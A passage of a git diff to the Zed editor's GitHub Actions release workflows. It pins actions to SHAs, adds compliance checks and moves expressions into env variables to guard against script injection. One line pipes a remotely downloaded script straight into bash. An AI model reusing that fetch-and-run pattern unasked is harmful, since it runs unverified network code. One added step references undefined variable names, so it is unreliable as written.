github.repository_owner == 'zed-extensions') runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -187,14 +193,12 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_sccache @@ -214,7 +218,7 @@ jobs: runs-on: self-32vcpu-windows-2022 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -242,7 +246,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_tests::check_scripts::run_shellcheck @@ -251,8 +255,14 @@ jobs: name: run_tests::check_scripts::download_actionlint run: bash <(curl https://raw.githubusercontent.com/rhysd/actionlint/main/scripts/download-actionlint.bash) - name: run_tests::check_scripts::run_actionlint - run: | - ${{ steps.get_actionlint.outputs.executable }} -color + run: '"$ACTIONLINT_BIN" -color' + env: + ACTIONLINT_BIN: ${{ steps.get_actionlint.outputs.executable }} + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup - name: run_tests::check_scripts::check_xtask_workflows run: | cargo xtask workflows @@ -267,7 +277,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 25 @@ -283,6 +293,51 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} timeout-minutes: 60 + compliance_check: + if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') + runs-on: namespace-profile-16x32-ubuntu-2204 + env: + COMPLIANCE_FILE_PATH: compliance.md + steps: + - name: steps::checkout_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + fetch-depth: 0 + ref: ${{ github.ref }} + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup + - id: run-compliance-check + name: release::compliance_check::run_compliance_check + run: cargo xtask compliance "$GITHUB_REF_NAME" --report-path "$COMPLIANCE_FILE_OUTPUT" + env: + GITHUB_APP_ID: ${{ secrets.ZED_ZIPPY_APP_ID }} + GITHUB_APP_KEY: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + - name: release::compliance_check::send_compliance_slack_notification + if: always() + run: | + if [ "$COMPLIANCE_OUTCOME" == "success" ]; then + STATUS="✅ Compliance check passed for $GITHUB_REF_NAME" + else + STATUS="❌ Compliance check failed for $GITHUB_REF_NAME" + fi + + REPORT_CONTENT="" + if [ -f "$COMPLIANCE_FILE_OUTPUT" ]; then + REPORT_CONTENT=$(cat "$REPORT_FILE") + fi + + MESSAGE=$(printf "%s\n\n%s" "$STATUS" "$REPORT_CONTENT") + + curl -X POST -H 'Content-type: application/json' \ + --data "$(jq -n --arg text "$MESSAGE" '{"text": $text}')" \ + "$SLACK_WEBHOOK" + env: + SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK_WORKFLOW_FAILURES }} + COMPLIANCE_OUTCOME: ${{ steps.run-compliance-check.outcome }} bundle_linux_aarch64: needs: - run_tests_linux @@ -293,9 +348,11 @@ jobs: CARGO_INCREMENTAL: 0 ZED_CLIENT_CHECKSUM_SEED: ${{ secrets.ZED_CLIENT_CHECKSUM_SEED }} ZED_MINIDUMP_ENDPOINT: ${{ secrets.ZED_SENTRY_MINIDUMP_ENDPOINT }} + CC: clang-18 + CXX: clang++-18 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_sentry @@ -304,8 +361,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -333,9 +388,11 @@ jobs: CARGO_INCREMENTAL: 0 ZED_CLIENT_CHECKSUM_SEED: ${{ secrets.ZED_CLIENT_CHECKSUM_SEED }} ZED_MINIDUMP_ENDPOINT: ${{ secrets.ZED_SENTRY_MINIDUMP_ENDPOINT }} + CC: clang-18 + CXX: clang++-18 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_sentry @@ -344,8 +401,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -380,7 +435,7 @@ jobs: APPLE_NOTARIZATION_ISSUER_ID: ${{ secrets.APPLE_NOTARIZATION_ISSUER_ID }} steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_node @@ -425,7 +480,7 @@ jobs: APPLE_NOTARIZATION_ISSUER_ID: ${{ secrets.APPLE_NOTARIZATION_ISSUER_ID }} steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_node @@ -474,7 +529,7 @@ jobs: TIMESTAMP_SERVER: http://timestamp.acs.microsoft.com steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_sentry @@ -519,7 +574,7 @@ jobs: TIMESTAMP_SERVER: http://timestamp.acs.microsoft.com steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_sentry @@ -603,22 +658,61 @@ jobs: echo "All expected assets are present in the release." env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: steps::checkout_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + fetch-depth: 0 + ref: ${{ github.ref }} + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup + - id: run-post-upload-compliance-check + name: release::validate_release_assets::run_post_upload_compliance_check + run: cargo xtask compliance "$GITHUB_REF_NAME" --report-path target/compliance-report + env: + GITHUB_APP_ID: ${{ secrets.ZED_ZIPPY_APP_ID }} + GITHUB_APP_KEY: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + - name: release::validate_release_assets::send_post_upload_compliance_notification + if: always() + run: | + if [ -z "$COMPLIANCE_OUTCOME" ] || [ "$COMPLIANCE_OUTCOME" == "skipped" ]; then + echo "Compliance check was skipped, not sending notification" + exit 0 + fi + + TAG="$GITHUB_REF_NAME" + + if [ "$COMPLIANCE_OUTCOME" == "success" ]; then + MESSAGE="✅ Post-upload compliance re-check passed for $TAG" + else + MESSAGE="❌ Post-upload compliance re-check failed for $TAG" + fi + + curl -X POST -H 'Content-type: application/json' \ + --data "$(jq -n --arg text "$MESSAGE" '{"text": $text}')" \ + "$SLACK_WEBHOOK" + env: + SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK_WORKFLOW_FAILURES }} + COMPLIANCE_OUTCOME: ${{ steps.run-post-upload-compliance-check.outcome }} auto_release_preview: needs: - validate_release_assets if: startsWith(github.ref, 'refs/tags/v') && endsWith(github.ref, '-pre') && !endsWith(github.ref, '.0-pre') runs-on: namespace-profile-2x4-ubuntu-2404 steps: - - id: get-app-token + - id: generate-token name: steps::authenticate_as_zippy - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} - name: gh release edit "$GITHUB_REF_NAME" --repo=zed-industries/zed --draft=false run: gh release edit "$GITHUB_REF_NAME" --repo=zed-industries/zed --draft=false env: - GITHUB_TOKEN: ${{ steps.get-app-token.outputs.token }} + GITHUB_TOKEN: ${{ steps.generate-token.outputs.token }} push_release_update_notification: needs: - create_draft_release @@ -644,12 +738,7 @@ jobs: - id: generate-webhook-message name: release::generate_slack_message run: | - MESSAGE=$(DRAFT_RESULT="${{ needs.create_draft_release.result }}" - UPLOAD_RESULT="${{ needs.upload_release_assets.result }}" - VALIDATE_RESULT="${{ needs.validate_release_assets.result }}" - AUTO_RELEASE_RESULT="${{ needs.auto_release_preview.result }}" - TAG="$GITHUB_REF_NAME" - RUN_URL="${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}" + MESSAGE=$(TAG="$GITHUB_REF_NAME" if [ "$DRAFT_RESULT" == "failure" ]; then echo "❌ Draft release creation failed for $TAG: $RUN_URL" @@ -659,19 +748,19 @@ jobs: echo "❌ Release asset upload failed for $TAG: $RELEASE_URL" elif [ "$UPLOAD_RESULT" == "cancelled" ] || [ "$UPLOAD_RESULT" == "skipped" ]; then FAILED_JOBS="" - if [ "${{ needs.run_tests_mac.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS run_tests_mac"; fi - if [ "${{ needs.run_tests_linux.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS run_tests_linux"; fi - if [ "${{ needs.run_tests_windows.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS run_tests_windows"; fi - if [ "${{ needs.clippy_mac.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS clippy_mac"; fi - if [ "${{ needs.clippy_linux.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS clippy_linux"; fi - if [ "${{ needs.clippy_windows.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS clippy_windows"; fi - if [ "${{ needs.check_scripts.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS check_scripts"; fi - if [ "${{ needs.bundle_linux_aarch64.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_linux_aarch64"; fi - if [ "${{ needs.bundle_linux_x86_64.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_linux_x86_64"; fi - if [ "${{ needs.bundle_mac_aarch64.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_mac_aarch64"; fi - if [ "${{ needs.bundle_mac_x86_64.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_mac_x86_64"; fi - if [ "${{ needs.bundle_windows_aarch64.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_windows_aarch64"; fi - if [ "${{ needs.bundle_windows_x86_64.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_windows_x86_64"; fi + if [ "$RESULT_RUN_TESTS_MAC" == "failure" ];then FAILED_JOBS="$FAILED_JOBS run_tests_mac"; fi + if [ "$RESULT_RUN_TESTS_LINUX" == "failure" ];then FAILED_JOBS="$FAILED_JOBS run_tests_linux"; fi + if [ "$RESULT_RUN_TESTS_WINDOWS" == "failure" ];then FAILED_JOBS="$FAILED_JOBS run_tests_windows"; fi + if [ "$RESULT_CLIPPY_MAC" == "failure" ];then FAILED_JOBS="$FAILED_JOBS clippy_mac"; fi + if [ "$RESULT_CLIPPY_LINUX" == "failure" ];then FAILED_JOBS="$FAILED_JOBS clippy_linux"; fi + if [ "$RESULT_CLIPPY_WINDOWS" == "failure" ];then FAILED_JOBS="$FAILED_JOBS clippy_windows"; fi + if [ "$RESULT_CHECK_SCRIPTS" == "failure" ];then FAILED_JOBS="$FAILED_JOBS check_scripts"; fi + if [ "$RESULT_BUNDLE_LINUX_AARCH64" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_linux_aarch64"; fi + if [ "$RESULT_BUNDLE_LINUX_X86_64" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_linux_x86_64"; fi + if [ "$RESULT_BUNDLE_MAC_AARCH64" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_mac_aarch64"; fi + if [ "$RESULT_BUNDLE_MAC_X86_64" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_mac_x86_64"; fi + if [ "$RESULT_BUNDLE_WINDOWS_AARCH64" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_windows_aarch64"; fi + if [ "$RESULT_BUNDLE_WINDOWS_X86_64" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_windows_x86_64"; fi FAILED_JOBS=$(echo "$FAILED_JOBS" | xargs) if [ "$UPLOAD_RESULT" == "cancelled" ]; then if [ -n "$FAILED_JOBS" ]; then @@ -700,12 +789,29 @@ jobs: echo "message=$MESSAGE" >> "$GITHUB_OUTPUT" env: GH_TOKEN: ${{ github.token }} + DRAFT_RESULT: ${{ needs.create_draft_release.result }} + UPLOAD_RESULT: ${{ needs.upload_release_assets.result }} + VALIDATE_RESULT: ${{ needs.validate_release_assets.result }} + AUTO_RELEASE_RESULT: ${{ needs.auto_release_preview.result }} + RUN_URL: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }} + RESULT_RUN_TESTS_MAC: ${{ needs.run_tests_mac.result }} + RESULT_RUN_TESTS_LINUX: ${{ needs.run_tests_linux.result }} + RESULT_RUN_TESTS_WINDOWS: ${{ needs.run_tests_windows.result }} + RESULT_CLIPPY_MAC: ${{ needs.clippy_mac.result }} + RESULT_CLIPPY_LINUX: ${{ needs.clippy_linux.result }} + RESULT_CLIPPY_WINDOWS: ${{ needs.clippy_windows.result }} + RESULT_CHECK_SCRIPTS: ${{ needs.check_scripts.result }} + RESULT_BUNDLE_LINUX_AARCH64: ${{ needs.bundle_linux_aarch64.result }} + RESULT_BUNDLE_LINUX_X86_64: ${{ needs.bundle_linux_x86_64.result }} + RESULT_BUNDLE_MAC_AARCH64: ${{ needs.bundle_mac_aarch64.result }} + RESULT_BUNDLE_MAC_X86_64: ${{ needs.bundle_mac_x86_64.result }} + RESULT_BUNDLE_WINDOWS_AARCH64: ${{ needs.bundle_windows_aarch64.result }} + RESULT_BUNDLE_WINDOWS_X86_64: ${{ needs.bundle_windows_x86_64.result }} - name: release::send_slack_message - run: | - curl -X POST -H 'Content-type: application/json'\ - --data '{"text":"${{ steps.generate-webhook-message.outputs.message }}"}' "$SLACK_WEBHOOK" + run: 'curl -X POST -H ''Content-type: application/json'' --data "$(jq -n --arg text "$SLACK_MESSAGE" ''{"text": $text}'')" "$SLACK_WEBHOOK"' env: SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK_WORKFLOW_FAILURES }} + SLACK_MESSAGE: ${{ steps.generate-webhook-message.outputs.message }} concurrency: group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} cancel-in-progress: true diff --git a/.github/workflows/release_nightly.yml b/.github/workflows/release_nightly.yml index d3f01447e52f418713499b84ad454085fd3cb646..30d0e1fbf9c7955d1216e2e3d7ac51a9a51f4416 100644 --- a/.github/workflows/release_nightly.yml +++ b/.github/workflows/release_nightly.yml @@ -16,7 +16,7 @@ jobs: runs-on: namespace-profile-mac-large steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 0 @@ -30,7 +30,7 @@ jobs: runs-on: self-32vcpu-windows-2022 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -70,7 +70,7 @@ jobs: runs-on: self-32vcpu-windows-2022 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -103,9 +103,11 @@ jobs: CARGO_INCREMENTAL: 0 ZED_CLIENT_CHECKSUM_SEED: ${{ secrets.ZED_CLIENT_CHECKSUM_SEED }} ZED_MINIDUMP_ENDPOINT: ${{ secrets.ZED_SENTRY_MINIDUMP_ENDPOINT }} + CC: clang-18 + CXX: clang++-18 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_bundling::set_release_channel_to_nightly @@ -120,8 +122,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -149,9 +149,11 @@ jobs: CARGO_INCREMENTAL: 0 ZED_CLIENT_CHECKSUM_SEED: ${{ secrets.ZED_CLIENT_CHECKSUM_SEED }} ZED_MINIDUMP_ENDPOINT: ${{ secrets.ZED_SENTRY_MINIDUMP_ENDPOINT }} + CC: clang-18 + CXX: clang++-18 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_bundling::set_release_channel_to_nightly @@ -166,8 +168,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -202,7 +202,7 @@ jobs: APPLE_NOTARIZATION_ISSUER_ID: ${{ secrets.APPLE_NOTARIZATION_ISSUER_ID }} steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_bundling::set_release_channel_to_nightly @@ -253,7 +253,7 @@ jobs: APPLE_NOTARIZATION_ISSUER_ID: ${{ secrets.APPLE_NOTARIZATION_ISSUER_ID }} steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_bundling::set_release_channel_to_nightly @@ -308,7 +308,7 @@ jobs: TIMESTAMP_SERVER: http://timestamp.acs.microsoft.com steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_bundling::set_release_channel_to_nightly @@ -361,7 +361,7 @@ jobs: TIMESTAMP_SERVER: http://timestamp.acs.microsoft.com steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_bundling::set_release_channel_to_nightly @@ -406,11 +406,11 @@ jobs: GIT_LFS_SKIP_SMUDGE: '1' steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_nix_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: nix - name: nix_build::build_nix::install_nix @@ -440,11 +440,11 @@ jobs: GIT_LFS_SKIP_SMUDGE: '1' steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_nix_store_macos - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: path: ~/nix-cache - name: nix_build::build_nix::install_nix @@ -488,7 +488,7 @@ jobs: runs-on: namespace-profile-4x8-ubuntu-2204 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 0 @@ -550,11 +550,10 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: release::send_slack_message - run: | - curl -X POST -H 'Content-type: application/json'\ - --data '{"text":"❌ ${{ github.workflow }} failed: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}"}' "$SLACK_WEBHOOK" + run: 'curl -X POST -H ''Content-type: application/json'' --data "$(jq -n --arg text "$SLACK_MESSAGE" ''{"text": $text}'')" "$SLACK_WEBHOOK"' env: SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK_WORKFLOW_FAILURES }} + SLACK_MESSAGE: '❌ ${{ github.workflow }} failed: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}' defaults: run: shell: bash -euxo pipefail {0} diff --git a/.github/workflows/run_agent_evals.yml b/.github/workflows/run_agent_evals.yml deleted file mode 100644 index c506039ce7c1863bd3c60091beb78d5239110bbd..0000000000000000000000000000000000000000 --- a/.github/workflows/run_agent_evals.yml +++ /dev/null @@ -1,73 +0,0 @@ -# Generated from xtask::workflows::run_agent_evals -# Rebuild with `cargo xtask workflows`. -name: run_agent_evals -env: - CARGO_TERM_COLOR: always - CARGO_INCREMENTAL: '0' - RUST_BACKTRACE: '1' - ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }} - OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }} - GOOGLE_AI_API_KEY: ${{ secrets.GOOGLE_AI_API_KEY }} - GOOGLE_CLOUD_PROJECT: ${{ secrets.GOOGLE_CLOUD_PROJECT }} - ZED_CLIENT_CHECKSUM_SEED: ${{ secrets.ZED_CLIENT_CHECKSUM_SEED }} - ZED_EVAL_TELEMETRY: '1' - MODEL_NAME: ${{ inputs.model_name }} -on: - workflow_dispatch: - inputs: - model_name: - description: model_name - required: true - type: string -jobs: - agent_evals: - runs-on: namespace-profile-16x32-ubuntu-2204 - steps: - - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 - with: - clean: false - - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 - with: - cache: rust - path: ~/.rustup - - name: steps::setup_linux - run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - - name: steps::download_wasi_sdk - run: ./script/download-wasi-sdk - - name: steps::setup_cargo_config - run: | - mkdir -p ./../.cargo - cp ./.cargo/ci-config.toml ./../.cargo/config.toml - - name: steps::setup_sccache - run: ./script/setup-sccache - env: - R2_ACCOUNT_ID: ${{ secrets.R2_ACCOUNT_ID }} - R2_ACCESS_KEY_ID: ${{ secrets.R2_ACCESS_KEY_ID }} - R2_SECRET_ACCESS_KEY: ${{ secrets.R2_SECRET_ACCESS_KEY }} - SCCACHE_BUCKET: sccache-zed - - name: cargo build --package=eval - run: cargo build --package=eval - - name: run_agent_evals::agent_evals::run_eval - run: cargo run --package=eval -- --repetitions=8 --concurrency=1 --model "${MODEL_NAME}" - env: - ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }} - OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }} - GOOGLE_AI_API_KEY: ${{ secrets.GOOGLE_AI_API_KEY }} - GOOGLE_CLOUD_PROJECT: ${{ secrets.GOOGLE_CLOUD_PROJECT }} - - name: steps::show_sccache_stats - run: sccache --show-stats || true - - name: steps::cleanup_cargo_config - if: always() - run: | - rm -rf ./../.cargo - timeout-minutes: 600 -concurrency: - group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} - cancel-in-progress: true -defaults: - run: - shell: bash -euxo pipefail {0} diff --git a/.github/workflows/run_bundling.yml b/.github/workflows/run_bundling.yml index 2b536425a1dc4b9663c726fd9259c95e0626efda..71b2e4d5fa0b386334bb8acab8e732f1c7d0ad93 100644 --- a/.github/workflows/run_bundling.yml +++ b/.github/workflows/run_bundling.yml @@ -19,9 +19,11 @@ jobs: CARGO_INCREMENTAL: 0 ZED_CLIENT_CHECKSUM_SEED: ${{ secrets.ZED_CLIENT_CHECKSUM_SEED }} ZED_MINIDUMP_ENDPOINT: ${{ secrets.ZED_SENTRY_MINIDUMP_ENDPOINT }} + CC: clang-18 + CXX: clang++-18 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_sentry @@ -30,8 +32,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -58,9 +58,11 @@ jobs: CARGO_INCREMENTAL: 0 ZED_CLIENT_CHECKSUM_SEED: ${{ secrets.ZED_CLIENT_CHECKSUM_SEED }} ZED_MINIDUMP_ENDPOINT: ${{ secrets.ZED_SENTRY_MINIDUMP_ENDPOINT }} + CC: clang-18 + CXX: clang++-18 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_sentry @@ -69,8 +71,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -104,7 +104,7 @@ jobs: APPLE_NOTARIZATION_ISSUER_ID: ${{ secrets.APPLE_NOTARIZATION_ISSUER_ID }} steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_node @@ -148,7 +148,7 @@ jobs: APPLE_NOTARIZATION_ISSUER_ID: ${{ secrets.APPLE_NOTARIZATION_ISSUER_ID }} steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_node @@ -196,7 +196,7 @@ jobs: TIMESTAMP_SERVER: http://timestamp.acs.microsoft.com steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_sentry @@ -240,7 +240,7 @@ jobs: TIMESTAMP_SERVER: http://timestamp.acs.microsoft.com steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_sentry @@ -274,11 +274,11 @@ jobs: GIT_LFS_SKIP_SMUDGE: '1' steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_nix_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: nix - name: nix_build::build_nix::install_nix @@ -306,11 +306,11 @@ jobs: GIT_LFS_SKIP_SMUDGE: '1' steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_nix_store_macos - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: path: ~/nix-cache - name: 